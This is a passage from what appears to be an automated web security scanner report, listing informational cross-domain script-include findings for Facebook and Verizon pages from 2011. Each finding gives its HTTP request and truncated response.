Vary: Accept-Encoding, User-Agent
Content-Length: 32625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equiv="refresh" content="1200">

<script type="text/javascript" src="http://i.techweb.com/darkreading/detect.js"></script>
...[SNIP]...
<meta name="google-site-verification" content="oW_AmzGcViviVv2AI4k1ZPMek1AJgDWyjHXSsPRUWFE" />

<script src='http://i.cmpnet.com/informationweek/js/jquery-1.2.6.min.js'></script>
<script type="text/javascript" src="http://i.cmpnet.com/techweb/scripts/ddtabmenu.js"></script>
...[SNIP]...
</style>
<script language="JavaScript" type="text/javascript" src="http://i.cmpnet.com/informationweek/nop/popup.js"></script>
<script src="http://ar.voicefive.com/bmx3/node.pli?pub=ubm"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://i.cmpnet.com/shared/omniture/h_s_code_remote.js"></script>
...[SNIP]...

<script src="http://content.dl-rms.com/rms/mother/19171/nodetag.js"></script>
...[SNIP]...
<br />

<SCRIPT TYPE='text/javascript' LANGUAGE='JavaScript' SRC='http://twimgs.com/informationweek/elqNow/elqCfg.js'></SCRIPT>
<SCRIPT TYPE='text/javascript' LANGUAGE='JavaScript' SRC='http://twimgs.com/informationweek/elqNow/elqImg.js'></SCRIPT>
...[SNIP]...

16.30. http://www.facebook.com/connect/prompt_feed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/prompt_feed.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

GET /connect/prompt_feed.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.50
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 12409

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/connect\/prompt_feed.php";window._EagleEyeSeed="a2xk";</s
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yQ/r/JfaxZMmy8mJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

16.31. http://www.facebook.com/dialog/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/dialog/feed

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yQ/r/JfaxZMmy8mJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

16.32. http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/first_6_months/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/about/promotions/first_6_months/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.33. http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/premium_data_center/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

16.34. http://www.verizonbusiness.com/Medium/about/promotions/smp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/about/promotions/smp/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/about/promotions/smp/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.35. http://www.verizonbusiness.com/Medium/bundles/vsbb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/bundles/vsbb/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/bundles/vsbb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.36. http://www.verizonbusiness.com/Medium/products/conferencing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/conferencing/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/products/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.37. http://www.verizonbusiness.com/Medium/products/internet/ida/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/internet/ida/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/products/internet/ida/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.38. http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/products/managed/managed_mobility/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/products/managed/managed_mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.39. http://www.verizonbusiness.com/Medium/resources/vertical.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/resources/vertical.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/resources/vertical.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.13.9.1315279542633; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "8343e9725048ce298d7591f692b4ce95"
Last-Modified: Mon, 05 Sep 2011 22:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 35481
Date: Mon, 05 Sep 2011 22:27:10 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:27:10 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.40. http://www.verizonbusiness.com/Medium/sign-in/vec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

16.41. http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/basic.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/basic.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.3.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "efabc9eb5d40da22e2cb4cf79593e04e"
Last-Modified: Mon, 05 Sep 2011 22:22:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 23484
Date: Mon, 05 Sep 2011 22:22:29 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:29 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom" type="text/javascript"></script>
...[SNIP]...

16.42. http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/essentials.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/essentials.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.2.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:14 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "9fc0b24323db5f76be4b1cfc3dd676c8"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 26281
Date: Mon, 05 Sep 2011 22:22:14 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:14 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.43. http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/igus.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/igus.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.6.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "10b85a197b72ecf9f7e34e76c23b568f"
Last-Modified: Mon, 05 Sep 2011 22:23:12 GMT
Vary: *
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 22693
Date: Mon, 05 Sep 2011 22:23:12 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:23:12 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.44. http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/looking.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/looking.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.10.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "fc491c0b43858ff0d9914c34c0d12332"
Last-Modified: Mon, 05 Sep 2011 22:25:31 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 21785
Date: Mon, 05 Sep 2011 22:25:31 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:25:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom" type="text/javascript"></script>
...[SNIP]...

16.45. http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/network.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/network.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.2.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:18 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "6b7625234ff33f97a48e6869288d96f4"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23376
Date: Mon, 05 Sep 2011 22:22:18 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:18 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.46. http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/voip.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/voip.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.5.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:42 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "343cd25e06471fded4613ae60450d2ab"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 24141
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:42 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.47. http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/wan.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Medium/sign-in/vec/wan.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.5.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:52 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "1ae63ef34043aa573ff4ad6621f7d0f9"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23155
Date: Mon, 05 Sep 2011 22:22:53 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:52 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.48. http://www.verizonbusiness.com/about/ipinnovation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/about/ipinnovation/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

16.49. http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.7.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "5eff3d3484488f3a491f0ebee89e9e2b"
Last-Modified: Mon, 05 Sep 2011 22:18:11 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 33927
Date: Mon, 05 Sep 2011 22:18:11 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:18:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.50. http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/us/Products/networking/internet/ipv6/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /us/Products/networking/internet/ipv6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.51. http://www.verizonwireless.com/b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
